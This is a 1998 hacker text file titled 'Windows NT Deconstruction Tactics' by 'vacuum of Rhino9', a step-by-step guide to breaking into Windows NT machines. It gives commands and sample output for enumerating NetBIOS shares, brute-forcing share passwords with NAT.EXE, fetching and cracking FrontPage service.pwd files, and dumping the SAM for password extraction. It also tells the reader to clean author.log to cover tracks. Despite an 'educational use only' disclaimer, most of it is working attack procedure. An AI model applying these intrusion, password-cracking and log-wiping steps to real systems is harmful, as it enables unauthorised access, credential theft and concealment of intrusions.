Windows NT Deconsctruction Tatics Step by Step NT Explotation Techniques by vacuum of Rhino9 & Technotronic vacuum@technotronic.com This text is for educational use only. You will not find a point and click NT hacking tool. This text was written to explain some of the malicious uses of some of the utilities included within Windows NT. Finding system vulnerabilities is becoming a lost art. Todays young hackers want a program that will preform all of the tasks for them, while this is not necessarily a bad thing, it does tend to supress individual ideas which could lead to new exploits. Revision 4 03/16/98 I apologize for so many revisions in such a short time. This document is a work in progress. Changes in Revision 4: Included Frontpage information. NetBIOS information fully discussed. rdisk /s information. Made this .zip more like a unix rootkit by included all the mentioned tools. Cleaned up the overall layout. I. Initial Access Strategy 1.)NetBIOS Shares Using Microsoft Executables a. NET.EXE 's other uses 2.)NAT The NetBIOS Auditing Tool II.FrontPage Exploitation 1.)FrontPage password decryption on unix servers with frontpage extensions. III. Registry Vulnerabilities 1.) rdisk /s to dump the SAM (Security Account Manager) 2.) gaining access to the regisry with the AT.EXE command (local) 3.) REGEDT32.EXE and REGEDIT.EXE 4.) REGINI.EXE and REGDMP.EXE remote registry editing tools 5.) Using the Registry to Execute Malicious Code IV. Trojan .lnk (shortcuts) 1.)Security hole within winnt\profiles and login scripts V. Workarounds for common sytsem policy restrictions VI. PWDUMP Example Included Files: NTExploits.txt this document samproof.txt example of the sam hive from the registry notepad.reg Example .reg file that starts up notepad.exe upon login. Could be any executable. service.pwd Service.pwd frontpage password example. NetBIOS Shares Using the standard Microsoft Executables C:\>NBTSTAT -A 123.123.123.123 C:\>NBTSTAT -a www.target.com NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D After a NetBIOS share is found, it can be added to the LMHOSTS file. Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood. Example of LHOSTS file: 123.123.123.123 student1 24.3.9.12 target2 Now you can use the find computer options within NT or 95 to browse the shares. An alternative option would be to use the very powerful NET.EXE C:\>net view 123.123.123.123 C:\>net view \\student1 Shared resources at 123.123.123.123 Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ shares are hidden and are not shown. C:\net use x: \\123.123.123.123\test The command completed successfully. Now the command prompt or the NT Explorer can be used to access the remote drive X: C:\net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK X: \\123.123.123.123\test Microsoft Windows Network OK \\123.123.123.123\test Microsoft Windows Network The command completed successfully. Here are some other interesting things that NET.EXE can be used for that are not related to NetBIOS. NET localgroup will show which groups have been created on the local machine. NET name will show you the name of the computer as well as who is logged in. NET accounts will show the password restrictions for the user. NET share displays the shares for the local machine including the $ shares which are supposed to be hidden heheh?? NET user will show you which accounts are created on the local machine. This can be useful when adding user names to NAT The NetBIOS Auditing Tool to brute force the shares show using NET share. NET start SERVICE. For Example, net start schedule This will start the schedule service which can be used to access the complete registry on a local machine. NAT (NetBIOS Auditing Tool) This technique works the the default share type everyone full control. If you are denied access, permissions have been applied to the share, and a password will be required. NAT.EXE (NetBIOS Auditing Tool) NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempt- ing to guess the password on the remote server. Usernames should appear one per line in the speci- fied file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempt- ing to guess the password on the remote server. Passwords should appear one per line in the speci- fied file.
Addresses should be specified in comma deliminated format, with no spaces. Valid address specifica- tions include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. NAT.EXE does all of the above techniques plus it will try Administrative shares ($), scan a range of IP addresses and use a dictionary file to crack the NetBIOS passwords. NAT.EXE is the tool prefered by most hackers. C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: 204.73.131.11 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\Test [*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If Default share of Everyone/Full Control. Done it is hacked. FrontPage Exploitation: Most frontpage exploits compromise only the wwwroot directory and can be used to change the html of a site which has become a popular method of gaining fame in the hacker community. The following is a list of the Internet Information server files location in relation to the local hard drive (C:) and the web (www.target.com) C:\InetPub\wwwroot C:\InetPub\scripts /Scripts C:\InetPub\wwwroot\_vti_bin /_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut C:\InetPub\cgi-bin /cgi-bin C:\InetPub\wwwroot\srchadm /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin Using FrontPage, a hacker may alter the html of a remote website often frontpage webs are left un-passworded. On the FrontPage Explorer's File menu, choose Open FrontPage Web. In the Getting Started dialog box, select Open an Existing FrontPage Web and choose the FrontPage web you want to open. Click More Webs if the web you want to open is not listed. Click OK. If you are prompted for your author name and password, you will have to decrypt service.pwd, guess or move on. Enter them in the Name and Password Required dialog box, and click OK. Alter the existing page, or upload a page of your own. Scanning PORT 80 (http) or 443 (https) options: GET /_vti_inf.html #Ensures that frontpage server extensions are installed. GET /_vti_pvt/service.pwd #Contains the encrypted password files. Not used on IIS and WebSite servers GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted names and passwords of authors. GET /_vti_pvt/administrators.pwd GET /_vti_log/author.log #If author.log is there it will need to be cleaned to cover your tracks GET /samples/search/queryhit.htm Other ways of obtaining service.pwdhttp://ftpsearch.com/index.html search for service.pwdhttp://www.alstavista.digital.com advanced search for link:"/_vti_pvt/service.pwd" Attempt to connect to the server using FTP. port 21 login anonymous password guest@unknown the anonymous login will use the internally created IISUSR_computername account to assign NT permissions. An incorrect configuration may leave areas vulnerable to attack. If service.pwd is obtained it will look similar to this: Vacuum:SGXJVl6OJ9zkE The above password is apple Turn it into DES format: Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash The run your favorite unix password cracker like john.exe (John The Ripper) against a large dictionary file or ntucrack.exe which will brute force crack the password. Registry Vulnerabilities: RDISK rdisk /s will dump the security and sam portions of the registry into c:\winnt\repair directory. It will also give you the option of creating an emergency repair diskette. This .zip includes SAMDUMP.EXE which can be used to extract passwords from emergency repair diskettes. Within that directory there will be a sam._ file. It is ethically used for the emergency repair disk. If you have gained access to the local drive through physical access or through netbios shares, run rdisk /s There is a utility called SAMDUP included within this .zip that will extract the passwords. GAINING ACCESS TO THE ENTIRE REGISTRY (Local) For this to work, you will need to start the schedule service. By default, this service is set to Manaul. Click Start/Settings/Control Panel/Services/ Then highlight Schedule Click Start (To start the service immediately. This will only be done once) Click Startup (To change the service to automatic to be started each time) NOTES about AT.EXE usage: AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command" \\computername Specifies a remote computer. Commands are scheduled on the local computer if this parameter is omitted. id Is an identification number assigned to a scheduled command. /delete Cancels a scheduled command. If id is omitted, all the scheduled commands on the computer are canceled. /yes Used with cancel all jobs command when no further confirmation is desired. time Specifies the time when command is to run. /interactive Allows the job to interact with the desktop of the user who is logged on at the time the job runs. /every:date[,...] Runs the command on each specified day(s) of the week or month. If date is omitted, the current day of the month is assumed. /next:date[,...] Runs the specified command on the next occurrence of the day (for example, next Thursday). If date is omitted, the current day of the month is assumed. "command" Is the Windows NT command, or batch program to be run. From a Command Prompt type: at